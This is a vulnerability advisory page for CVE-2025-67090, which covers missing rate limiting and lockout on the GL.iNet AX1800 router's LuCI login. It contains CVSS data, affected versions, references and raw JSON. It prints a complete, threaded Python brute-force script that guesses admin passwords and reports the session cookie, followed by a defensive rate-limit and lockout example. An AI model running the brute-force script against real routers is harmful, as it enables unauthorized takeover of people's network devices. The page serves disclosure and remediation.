Security Vulnerability Report
CVE-2025-67090 CVSS 5.1 MEDIUM

CVE-2025-67090

Published: 2026-01-08 16:15:45
Last Modified: 2026-01-16 21:28:08

Description

The LuCI web interface on the GL.iNet AX1800, firmware versions 4.6.4 and 4.6.8, is vulnerable; a fix is available in version 4.8.2. The affected versions lack rate limiting and account lockout mechanisms on the authentication endpoint (`/cgi-bin/luci`), so an unauthenticated attacker on the local network can perform unlimited password attempts against the admin interface.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
Weakness: CWE-307 (Improper Restriction of Excessive Authentication Attempts)

Configurations (Affected Products)

cpe:2.3:o:gl-inet:ax1800_firmware:4.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:gl-inet:ax1800_firmware:4.6.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:gl-inet:ax1800_firmware:4.6.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:gl-inet:ax1800:-:*:*:*:*:*:*:* - NOT VULNERABLE
GL.Inet AX1800 Firmware < 4.8.2 (Version 4.6.4 affected)
GL.Inet AX1800 Firmware < 4.8.2 (Version 4.6.8 affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-67090 PoC - GL.iNet AX1800 brute-force
# Demonstrates the lack of rate limiting on the authentication endpoint.

import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests

TARGET_URL = "http://{router_ip}/cgi-bin/luci"  # router IP is filled in from argv
USERNAME = "root"
PASSWORD_FILE = "passwords.txt"
MAX_THREADS = 10
DELAY_BETWEEN_REQUESTS = 0.1


def attempt_login(target, password):
    """Attempt a login with the given password against the formatted target URL."""
    password = password.strip()
    try:
        data = {"username": USERNAME, "password": password}
        response = requests.post(target, data=data, timeout=10)
        time.sleep(DELAY_BETWEEN_REQUESTS)
        # A session cookie in the response is taken as the success indicator
        if response.status_code == 200 and "sysauth" in response.cookies:
            return True, password, response
        # No rate limiting detected - continue attempts
        return False, password, response
    except requests.exceptions.RequestException as e:
        return False, password, str(e)


def main():
    router_ip = sys.argv[1] if len(sys.argv) > 1 else input("Enter router IP: ")
    target = TARGET_URL.format(router_ip=router_ip)
    print(f"[*] Target: {target}")
    print(f"[*] Username: {USERNAME}")
    print("[*] Starting brute force attack (no rate limiting detected)...")

    try:
        with open(PASSWORD_FILE, "r") as f:
            passwords = f.readlines()
    except FileNotFoundError:
        print("[!] Password file not found. Using common passwords...")
        passwords = ["admin", "password", "123456", "admin123", "default", "glinet"]

    found = False
    attempt_count = 0
    with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        futures = {executor.submit(attempt_login, target, pwd): pwd for pwd in passwords}
        for future in as_completed(futures):
            success, password, response = future.result()
            attempt_count += 1
            if success:
                print("\n[!] SUCCESS! Valid credentials found:")
                print(f"    Username: {USERNAME}")
                print(f"    Password: {password}")
                print(f"    Auth Cookie: {response.cookies.get('sysauth')}")
                found = True
                executor.shutdown(wait=False, cancel_futures=True)
                break
            if attempt_count % 10 == 0:
                print(f"[*] Attempts: {attempt_count} - No rate limiting detected...")

    if not found:
        print(f"\n[-] Attack completed. {attempt_count} attempts made.")
        print("[-] No valid credentials found in password list.")


if __name__ == "__main__":
    main()

# Remediation: Upgrade to GL.iNet AX1800 firmware version 4.8.2
```
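As the defender's counterpart to the PoC, here is an added example (not GL.iNet or LuCI code) of the two controls the description says the login endpoint lacks: a sliding-window rate limit per source address and a per-account lockout with exponential backoff, both evaluated before the password is checked. The `check_credentials` callback and the injectable `clock` are assumptions so the logic can be exercised without a router.

```python
import time
from collections import defaultdict, deque


class LoginGuard:
    """Per-source rate limit plus per-account lockout in front of a password check.
    Added example, not GL.iNet/LuCI code; check_credentials and clock are assumed."""

    def __init__(self, check_credentials, max_per_window=5, window=60.0,
                 lockout_failures=10, lockout_base=30.0, clock=time.monotonic):
        self.check = check_credentials            # callable(username, password) -> bool
        self.max_per_window = max_per_window      # attempts one source may make per window
        self.window = window                      # sliding window length in seconds
        self.lockout_failures = lockout_failures  # consecutive failures that lock an account
        self.lockout_base = lockout_base          # first lockout length, doubled per extra failure
        self.clock = clock
        self.attempts = defaultdict(deque)        # source -> timestamps of recent attempts
        self.failures = defaultdict(int)          # username -> consecutive failed attempts
        self.locked_until = {}                    # username -> time at which the lockout ends

    def _rate_limited(self, source):
        now = self.clock()
        recent = self.attempts[source]
        while recent and now - recent[0] > self.window:
            recent.popleft()                      # drop attempts that fell out of the window
        if len(recent) >= self.max_per_window:
            return True
        recent.append(now)
        return False

    def login(self, source, username, password):
        """Return 'ok', 'denied', 'rate_limited' or 'locked'."""
        now = self.clock()
        if self._rate_limited(source):
            return "rate_limited"                 # too many attempts from this address
        if self.locked_until.get(username, 0.0) > now:
            return "locked"                       # locked account: password is not evaluated
        if self.check(username, password):
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= self.lockout_failures:
            # Exponential backoff: each failure past the threshold doubles the lockout.
            extra = self.failures[username] - self.lockout_failures
            self.locked_until[username] = now + self.lockout_base * (2 ** extra)
        return "denied"
```

The account lockout is keyed on the username rather than the source, so a guessing run spread over many addresses still stops at the configured failure count.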

References

https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51 - Exploit, Third Party Advisory, Press/Media Coverage
https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub - Exploit, Third Party Advisory, Press/Media Coverage
https://www.gl-inet.com/security/ - Broken Link

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67090",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T16:15:45.470",
    "lastModified": "2026-01-16T21:28:08.207",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "The LuCI web interface on Gl Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 are vulnerable. Fix available in version 4.8.2 GL.Inet AX1800 Version 4.6.4 & 4.6.8 lacks rate limiting or account lockout mechanisms on the authentication endpoint (`/cgi-bin/luci`). An unauthenticated attacker on the local network can perform unlimited password attempts against the admin interface."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-307"}]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:ax1800_firmware:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "053BBC44-BD1D-40FD-91DC-D69A26CDE1AD"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:ax1800_firmware:4.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8D71DBB4-E154-47AC-9F4C-1C9912CB2880"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:ax1800_firmware:4.6.8:*:*:*:*:*:*:*", "matchCriteriaId": "BA1B1DB6-6773-48D0-A936-3B623DB3D558"}
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": false, "criteria": "cpe:2.3:h:gl-inet:ax1800:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCB312FD-370C-4DF9-961F-F0C4920AA368"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Press/Media Coverage"]},
      {"url": "https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Press/Media Coverage"]},
      {"url": "https://www.gl-inet.com/security/", "source": "[email protected]", "tags": ["Broken Link"]}
    ]
  }
}
```